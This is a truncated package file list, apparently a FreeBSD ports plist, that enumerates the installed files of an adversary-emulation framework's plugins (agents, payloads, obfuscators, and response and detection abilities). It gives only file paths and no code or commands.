+%%WWWDIR%%/plugins/manx/shells/sockets/rawtcp.go +%%WWWDIR%%/plugins/manx/shells/sockets/rawudp.go +%%WWWDIR%%/plugins/manx/shells/util/executors.go +%%WWWDIR%%/plugins/manx/static/css/basic.css +%%WWWDIR%%/plugins/manx/static/css/xterm.css +%%WWWDIR%%/plugins/manx/static/img/manx.png +%%WWWDIR%%/plugins/manx/static/js/terminal.js +%%WWWDIR%%/plugins/manx/static/js/xterm-addon-fit.min.js +%%WWWDIR%%/plugins/manx/static/js/xterm.js +%%WWWDIR%%/plugins/manx/templates/manx.html +%%WWWDIR%%/plugins/manx/update-shells.sh +%%WWWDIR%%/plugins/mock/.flake8 +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/mock/.github/pull_request_template.md +%%WWWDIR%%/plugins/mock/.gitignore +%%WWWDIR%%/plugins/mock/README.md +%%WWWDIR%%/plugins/mock/VERSION.txt +%%WWWDIR%%/plugins/mock/app/mock_gui_api.py +%%WWWDIR%%/plugins/mock/app/result_generator.py +%%WWWDIR%%/plugins/mock/app/simulation_svc.py +%%WWWDIR%%/plugins/mock/conf/agents.yml +%%WWWDIR%%/plugins/mock/conf/scenarios/alice.yml +%%WWWDIR%%/plugins/mock/conf/scenarios/hypervisor.yml +%%WWWDIR%%/plugins/mock/hook.py +%%WWWDIR%%/plugins/mock/templates/mock.html +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/response/.github/pull_request_template.md +%%WWWDIR%%/plugins/response/.gitignore +%%WWWDIR%%/plugins/response/README.md +%%WWWDIR%%/plugins/response/VERSION.txt +%%WWWDIR%%/plugins/response/app/c_processnode.py +%%WWWDIR%%/plugins/response/app/c_processtree.py +%%WWWDIR%%/plugins/response/app/parsers/basic_strip.py +%%WWWDIR%%/plugins/response/app/parsers/childprocess.py +%%WWWDIR%%/plugins/response/app/parsers/ecs_sysmon.py +%%WWWDIR%%/plugins/response/app/parsers/key_value.py +%%WWWDIR%%/plugins/response/app/parsers/ports.py +%%WWWDIR%%/plugins/response/app/parsers/process.py +%%WWWDIR%%/plugins/response/app/parsers/processguids.py +%%WWWDIR%%/plugins/response/app/parsers/sysmon.py +%%WWWDIR%%/plugins/response/app/requirements/base_requirement.py +%%WWWDIR%%/plugins/response/app/requirements/basic.py +%%WWWDIR%%/plugins/response/app/requirements/has_property.py +%%WWWDIR%%/plugins/response/app/requirements/source_fact.py +%%WWWDIR%%/plugins/response/app/response_svc.py +%%WWWDIR%%/plugins/response/conf/response.yml +%%WWWDIR%%/plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/1b4aa8d5-ba97-4b9b-92a3-eaaaffbfdf0a.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/77272c88-ccf5-4225-a3d9-f9e171d1ca5b.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/8bc73098-54d1-4f69-abd5-271e3e2da5df.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml +%%WWWDIR%%/plugins/response/data/abilities/hunt/f9b3eff0-e11c-48de-9338-1578b351b14b.yml +%%WWWDIR%%/plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +%%WWWDIR%%/plugins/response/data/abilities/response/0fccf23f-6b1a-4ef3-8c89-e8bf27a1858f.yml +%%WWWDIR%%/plugins/response/data/abilities/response/13d0d9cf-e31a-47b6-9217-f38e3f7c25ef.yml +%%WWWDIR%%/plugins/response/data/abilities/response/2331077e-7be9-4e89-b2bb-32e8d7f6a708.yml +%%WWWDIR%%/plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +%%WWWDIR%%/plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +%%WWWDIR%%/plugins/response/data/abilities/response/4744d99f-5fea-42a8-8ec4-c228db57caea.yml +%%WWWDIR%%/plugins/response/data/abilities/response/5ec7ae3b-c909-41bb-9b6b-dadec409cd40.yml +%%WWWDIR%%/plugins/response/data/abilities/response/90418255-b202-4fc3-b0ea-b105bff39ca5.yml +%%WWWDIR%%/plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +%%WWWDIR%%/plugins/response/data/abilities/response/cb85039a-6196-4262-883b-0beeb804b83d.yml +%%WWWDIR%%/plugins/response/data/abilities/response/debd322d-2100-45f7-8832-29ef7c56786d.yml +%%WWWDIR%%/plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +%%WWWDIR%%/plugins/response/data/abilities/response/f5fb8bce-4a79-466a-8187-ed0cd8e8dbe1.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/83d7cf63-e10a-4615-a92e-dce257bf3b9d.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/90a67a85-e81c-4525-8bae-12a2c5787d9a.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/a65a62e1-b8c0-4f88-b564-166e7499d560.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml +%%WWWDIR%%/plugins/response/data/adversaries/169cdc73-8fea-49cf-9021-d0b3c24e2b17.yml +%%WWWDIR%%/plugins/response/data/adversaries/7e422753-ad7a-4401-bc8b-b12a28e69c25.yml +%%WWWDIR%%/plugins/response/data/adversaries/D21B9E7F-CFF5-4030-AD28-388085F8A815.yml +%%WWWDIR%%/plugins/response/data/adversaries/f61e3fc0-43d8-4b36-b5d3-710610b92974.yml +%%WWWDIR%%/plugins/response/data/sources/e1ceccf2-92b3-4a28-ade5-5f67a2dfd7e7.yml +%%WWWDIR%%/plugins/response/hook.py +%%WWWDIR%%/plugins/response/payloads/elasticat.py +%%WWWDIR%%/plugins/response/templates/response.html +%%WWWDIR%%/plugins/sandcat/.flake8 +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/sandcat/.github/pull_request_template.md +%%WWWDIR%%/plugins/sandcat/.github/workflows/go.yml +%%WWWDIR%%/plugins/sandcat/.github/workflows/sandcatextensions.yml +%%WWWDIR%%/plugins/sandcat/.gitignore +%%WWWDIR%%/plugins/sandcat/LICENSE +%%WWWDIR%%/plugins/sandcat/README.md +%%WWWDIR%%/plugins/sandcat/VERSION.txt +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/.gitkeep +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/dns_tunneling.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/ftp.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/gist.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/slack.py +%%WWWDIR%%/plugins/sandcat/app/extensions/donut/donut.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/native/native.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/native/native_aws.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/shellcode/shellcode.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/shells/shells.py +%%WWWDIR%%/plugins/sandcat/app/extensions/proxy/proxy_http.py +%%WWWDIR%%/plugins/sandcat/app/extensions/proxy/proxy_smb_pipe.py +%%WWWDIR%%/plugins/sandcat/app/extensions/shared/shared.py +%%WWWDIR%%/plugins/sandcat/app/sand_gui_api.py +%%WWWDIR%%/plugins/sandcat/app/sand_svc.py +%%WWWDIR%%/plugins/sandcat/app/utility/base_extension.py +%%WWWDIR%%/plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml +%%WWWDIR%%/plugins/sandcat/docs/Sandcat-Details.md +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/.gitkeep +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/dns_tunneling.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/ftp.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/gist.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/slack.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/dll_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut_helper_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/aws/s3upload.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/aws/s3upload_test.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/ls.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/pwd.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/read_file.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info_nix.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/native.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/testutil/testutil.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/util/util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/util/util_test.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode_linux.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/osascript.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/powershell_core.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/python.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_receiver_http.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_smb_pipe.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_smb_pipe_util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/shared/shared.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_factory.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_proxy.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_util.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/api.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/contact.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/contact_test.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/ssh_tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/core/core.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/base64.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/encoder.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/plaintext.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/donut/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/execute.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/aws/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/discovery/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/util/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shellcode/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/cmd.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/powershell.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/proc.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/proc_test.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shell.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_config.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_config_windows.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_shared.go +%%WWWDIR%%/plugins/sandcat/gocat/go.mod +%%WWWDIR%%/plugins/sandcat/gocat/go.sum +%%WWWDIR%%/plugins/sandcat/gocat/output/output.go +%%WWWDIR%%/plugins/sandcat/gocat/payload/disk.go +%%WWWDIR%%/plugins/sandcat/gocat/payload/disk_test.go +%%WWWDIR%%/plugins/sandcat/gocat/privdetect/privilegedetect.go +%%WWWDIR%%/plugins/sandcat/gocat/privdetect/privilegedetect_windows.go +%%WWWDIR%%/plugins/sandcat/gocat/proxy/proxy.go +%%WWWDIR%%/plugins/sandcat/gocat/proxy/proxy_util.go +%%WWWDIR%%/plugins/sandcat/gocat/sandcat.go +%%WWWDIR%%/plugins/sandcat/hook.py +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.pl.1 +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.pl.2 +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.py +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-inmem.sh +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-darwin +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-linux +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-windows +%%WWWDIR%%/plugins/sandcat/static/img/cat.jpg +%%WWWDIR%%/plugins/sandcat/templates/sandcat.html +%%WWWDIR%%/plugins/sandcat/update-agents.sh +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/ssl/.github/pull_request_template.md +%%WWWDIR%%/plugins/ssl/.gitignore +%%WWWDIR%%/plugins/ssl/README.md +%%WWWDIR%%/plugins/ssl/VERSION.txt +%%WWWDIR%%/plugins/ssl/app/ssl_gui_api.py +%%WWWDIR%%/plugins/ssl/conf/insecure_certificate.pem +%%WWWDIR%%/plugins/ssl/hook.py +%%WWWDIR%%/plugins/ssl/templates/haproxy.conf +%%WWWDIR%%/plugins/ssl/templates/ssl.html +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/stockpile/.github/pull_request_template.md +%%WWWDIR%%/plugins/stockpile/.gitignore +%%WWWDIR%%/plugins/stockpile/LICENSE +%%WWWDIR%%/plugins/stockpile/README.md +%%WWWDIR%%/plugins/stockpile/VERSION.txt +%%WWWDIR%%/plugins/stockpile/app/atomic.py +%%WWWDIR%%/plugins/stockpile/app/batch.py +%%WWWDIR%%/plugins/stockpile/app/buckets.py +%%WWWDIR%%/plugins/stockpile/app/donut.py +%%WWWDIR%%/plugins/stockpile/app/guided.py +%%WWWDIR%%/plugins/stockpile/app/look_ahead.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_basic.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_jumble.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_no_padding.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/caesar_cipher.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/plain_text.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/steganography.py +%%WWWDIR%%/plugins/stockpile/app/packers/gohide.py +%%WWWDIR%%/plugins/stockpile/app/packers/upx.py +%%WWWDIR%%/plugins/stockpile/app/parsers/54ndc47_remote_copy.py +%%WWWDIR%%/plugins/stockpile/app/parsers/acrn.py +%%WWWDIR%%/plugins/stockpile/app/parsers/antivirus.py +%%WWWDIR%%/plugins/stockpile/app/parsers/basic.py +%%WWWDIR%%/plugins/stockpile/app/parsers/bookmarks.py +%%WWWDIR%%/plugins/stockpile/app/parsers/broadcastip.py +%%WWWDIR%%/plugins/stockpile/app/parsers/filename.py +%%WWWDIR%%/plugins/stockpile/app/parsers/firewallping.py +%%WWWDIR%%/plugins/stockpile/app/parsers/gdomain.py +%%WWWDIR%%/plugins/stockpile/app/parsers/ipaddr.py +%%WWWDIR%%/plugins/stockpile/app/parsers/json.py +%%WWWDIR%%/plugins/stockpile/app/parsers/katz.py +%%WWWDIR%%/plugins/stockpile/app/parsers/nbtstat.py +%%WWWDIR%%/plugins/stockpile/app/parsers/net_view.py +%%WWWDIR%%/plugins/stockpile/app/parsers/netlocalgroup.py +%%WWWDIR%%/plugins/stockpile/app/parsers/nmap.py +%%WWWDIR%%/plugins/stockpile/app/parsers/printer_queue.py +%%WWWDIR%%/plugins/stockpile/app/parsers/reverse_nslookup.py +%%WWWDIR%%/plugins/stockpile/app/parsers/scan.py +%%WWWDIR%%/plugins/stockpile/app/parsers/share_mounted.py +%%WWWDIR%%/plugins/stockpile/app/parsers/ssh.py +%%WWWDIR%%/plugins/stockpile/app/parsers/wifipref.py +%%WWWDIR%%/plugins/stockpile/app/requirements/base_requirement.py +%%WWWDIR%%/plugins/stockpile/app/requirements/basic.py +%%WWWDIR%%/plugins/stockpile/app/requirements/no_backwards_movement.py +%%WWWDIR%%/plugins/stockpile/app/requirements/not_exists.py +%%WWWDIR%%/plugins/stockpile/app/requirements/paw_provenance.py +%%WWWDIR%%/plugins/stockpile/app/requirements/reachable.py +%%WWWDIR%%/plugins/stockpile/app/requirements/req_like.py +%%WWWDIR%%/plugins/stockpile/app/stockpile_svc.py +%%WWWDIR%%/plugins/stockpile/conf/default.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/316251ed-6a28-4013-812b-ddf5b5b007f8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/55678719-e76e-4df9-92aa-10655bbd1cf4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/94f21386-9547-43c4-99df-938ab05d45ce.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/cc191baa-7472-4386-a2f4-42f203f1acfd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/60f63260-39bb-4136-87a0-b6c2dca799fc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/eb814e03-811a-467a-bc6d-dcd453750fa2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/3aad5312-d48b-4206-9de4-39866c12e60f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/3c647015-ab0a-496a-8847-6ab173cd2b22.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/98e58fc4-3843-4511-89b1-50cb872e0c9b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/1258b063-27d6-489b-a677-4807faacf868.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/49470433-30ce-4714-a44b-bea9dbbeca9a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/7a6ba833-de40-466a-8969-5c37b13603e0.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a398986f-31b0-436a-87e9-c8e82c028f3c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a42dfc86-12f0-4f06-b0cf-24830c7f61f4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a74bc239-a196-4f7e-8d5c-fe8c0266071c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/b007f6e8-4a87-4440-8888-29ceab047d9b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/e5bcefee-262d-4568-a261-e8a20855ec81.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0093c0e0-68b6-4cab-b0d4-2b40b3c78f71.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/05cda6f6-2b1b-462e-bff1-845af94343f7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/13379ae1-d20e-4162-91f8-320d78a35e7f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/14a21534-350f-4d83-9dd7-3c56b93a0c17.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/1c353eb4-29ab-4dfe-88ed-f34f5a60848e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2488245e-bcbd-405d-920e-2de27db882b3.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/29451844-9b76-4e16-a9ee-d6feab4b24db.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2946edba-54d8-11eb-ae93-0242ac130002.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/364ea817-bbb9-4083-87dd-94b9dba45f6f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/46098c66-8d9a-4d23-8a95-dd5021c385ae.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/4d9b079c-9ede-4116-8b14-72ad3a5533af.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/530e47c6-8592-42bf-91df-c59ffbd8541b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5a4cb2be-2684-4801-9355-3a90c91e0004.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5c65eec8-4839-4713-a4e1-86b2e75d1927.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5dc841fd-28ad-40e2-b10e-fb007fe09e81.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6131397e-7765-424e-a594-3d7fb2d93a6a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml 